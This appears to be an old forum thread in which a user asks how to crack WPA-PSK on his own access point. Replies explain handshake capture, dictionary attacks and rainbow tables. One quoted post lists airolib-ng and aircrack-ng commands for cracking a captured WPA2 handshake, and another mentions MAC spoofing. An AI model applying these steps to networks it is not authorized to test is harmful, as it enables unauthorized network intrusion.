Hi all,

I have been testing a lot lately on my Linksys AP. WEP 128 bit and 64 bit is no problem anymore. But now I wanted to focus on WPA encryption. I have read some information on it, but still some things are not clear yet.

I have switched my encryption to WPA on my router with a Pre shared key. I have put a phrase in it. Not a standard phrase, so you won't find it in any dictionaries.

But now i'm stuck. I wan't to learn how to crack my own AP with the WPA protection. But how? I can't find any good tutorials on this subject. I have found some videos, but they all think the keyphrase is in the dictionary.

Is it possible to crack my WPA key when the keyphrase is not in the dictionary by brute forcing it? Who got the right tutorial for this?

Maybe it's just me and i'm a bad user of the search function, but I can't find it here or on google.

Is it possible to crack my WPA key when the keyphrase is not in the dictionary by brute forcing it?
Nope. No-can-do. The passphrase is salted with the SSID.

you need to search for john the ripper and cowpatty and how to use them in conjunction with each other. Also search for how to capture the 4 way handshake.

you will also need alot of time, cpu cycles or a cluster if you have chosen any kind of descent passphrase.

Also rainbow tables may be worth looking into

Also rainbow tables may be worth looking into
If you already know the SSID, genpmk will generate your own tables. Only if the SSID is already in a pre-computed set of tables, will those tables help at all...and only then if the passphrase was in the dictionary used to create the tables.

Lastly, you need an already-authenticated client.

This (http://lastbit.com/pswcalc.asp) should tell you about how long it would take.

Ok, so whenever I think of something that is not in the dictionary file, it won't be able to find it? That's what I make out of the answers. But for WEP there are all clear tuts on what to do and what not to do. There is no clear WPA tutorial which take you through it step by step? I could go and try things out like I have been doing, but that's not really working right now haha

FYI, both coWPAtty and Aircrack use dictionary attacks which are not strictly brute force attacks.

Ok, so whenever I think of something that is not in the dictionary file, it won't be able to find it?
This is correct. Your best bet to crack WPA is a good dictionary file and a weak passphrase.

Google Search time: 0.27 seconds
tutorial How to Crack WPA (http://www.aircrack-ng.org/doku.php?id=cracking_wpa)

If you already know the SSID, genpmk will generate your own tables. Only if the SSID is already in a pre-computed set of tables, will those tables help at all...and only then if the passphrase was in the dictionary used to create the tables.

Lastly, you need an already-authenticated client.

This is why I said "may"

The intention was only a point in the right direction for research, which if done properly would show just how impractical given a good passphrase this can be.

Google Search time: 0.27 seconds
tutorial How to Crack WPA (http://www.aircrack-ng.org/doku.php?id=cracking_wpa)

0.27 seconds? What's wrong with you man? He doesn't have time to waste like that searching.:D

This is why I said "may"

The intention was only a point in the right direction for research, which if done properly would show just how impractical given a good passphrase this can be.
I wasn't saying you were wrong...only adding more information. ;)

I wasn't saying you were wrong...only adding more information. ;)

Don't worry I took it the way it was intended :)

Lol

I just came out of a work meeting. So much information coming in. I can't get much more out haha.

Anyways, that was what I was looking for partly. And the impossible phrase cracking won't work. So first I have put my phrase in the dictionary to see if it works :)

Thanks for the help and I will let you guys now if it works out for me

So first I have put my phrase in the dictionary to see if it works :)
Other than luck, that's about the only way to make sure it works.

Other than luck, that's about the only way to make sure it works.

I'm currently deeply involved in an "Alternative" approach which would bypass the entire 4 way handshake. Very little success has been documented by me. But rest assured, if I do find this "Alternative" method, I'll be as famous as Ze Frenchie! :D

I'll be as famous as Ze Frenchie! :D


You wish ;)
Ze Frenchie! is da man:cool:

airolib-ng is a tool for the aircrack-ng suite to store and manage essid and password lists, compute their PMKs and use them in WPA/WPA2 cracking. it uses the lightweight sqlite3 database as a basis which is available on most platforms. i've chosen sqlite3 considering platform availability, management overhead and memory/disk overhead.
See the code attached for more info. This is the first version posted and - if accepted - to be included into the tree. there still may be bugs and work to be done before released is marked in the code.
To test the tool get yourself a current 1.0-dev checkout and...

apply the patch in #217 (http://trac.aircrack-ng.org/ticket/217)
apply the patch in #215 (http://trac.aircrack-ng.org/ticket/215)
get yourself the sqlite3 library and headers
compile airolib-ng with -lsqlite3 -lssl
compile aircrack-ng with -DHAVE_SQLITE and -lsqlite3. This will make a new option "-r" available
create a new database file with "airolib-ng testdb init"
import some essid, e.g. "echo Harkonen | airolib-ng testdb import ascii essid -"
import some passwords, e.g. "echo 12345678 | airolib-ng testdb import ascii passwd -"
start the batch process ("airolib-ng testdb batch"), wait for it to run out of work, kill it
crack your WPA/WPA2 handshake, e.g. "aircrack-ng -r testdb -e Harkonen -q wpa2.eapol.cap"

a "new" tool in 1.0 dev of aircrack : seems to be a nice tool for speed up things....i will try this after

I'm currently deeply involved in an "Alternative" approach which would bypass the entire 4 way handshake. Very little success has been documented by me. But rest assured, if I do find this "Alternative" method, I'll be as famous as Ze Frenchie! :D

Hi Xploitz,

Currently I'm deeply studying WPA, and I'm very interested what alternative method you came up with. Can you give a hint?

If you're not after the 4way handshake, then you're looking into the encryption algoritm itself, which will probably restrict your attack to WPA1. Ok, for a succesful decryption of a packet you'll need the TSC, MIC, TK, TA and the key mixing variables from the TK en TA.

I'm very curious what your attack vector is in this.

Greets,

I've scrapped the alternative method idea of mine. Why? Simple..I'm too unexperienced in WPA/WPA2 and algorithms to be completely honest. What I had planned to do was with the essid of the AP, determine the make of the AP and cross reference the algorithm used by the manufacture and create a "custom" salts / hash table ...but..unfortunately...my lack of experience is hindering my progress. Oh well...at least I conquered the FAKE MAC INTERNET ACCESS demon problem for Atheros chipset users!

I've scrapped the alternative method idea of mine. Why? Simple..I'm too unexperienced in WPA/WPA2 and algorithms to be completely honest. What I had planned to do was with the essid of the AP, determine the make of the AP and cross reference the algorithm used by the manufacture and create a "custom" salts / hash table ...but..unfortunately...my lack of experience is hindering my progress. Oh well...at least I conquered the FAKE MAC INTERNET ACCESS demon problem for Atheros chipset users!

Well, the algoritm is independent of the manufacturer of the AP, otherwise it won't comply to the 802.11 protocol specs :)

You can create a rainbowtable of hashes for a specific access point, but you'll still need the ssid, a valid MAC address, the 4way EAP handshake and a good dictionary file. And, this wil take a long time to compute.

WPA1 still uses RC4 (as is used in WEP) encryption, but the cipherstream is mixed with some variables which are derived from the PSK and some other numbers (ssid, mac). So, the weaker RC4 is protected by some components which makes the complete algoritm (TKIP) very difficult to break.

Well, there's always bruteforcing the PSK.

Fake mac address problem? What's that about? I've never had any problems with any of my Atheros cards?

Fake mac address problem? What's that about? I've never had any problems with any of my Atheros cards?


I guess you missed it..lol. If you knew how I sure could have used your help a month ago!!! Heres the link to the whole ordeal. No one could get their Atheros chipped card online while using a FAKED MAC address with BT2 Final..for BT1..yes no probs..but when BT2 came out..no one seemed to know how..or they were keeping it a secrete.

http://forums.remote-exploit.org/showthread.php?t=7117&highlight=fake+internet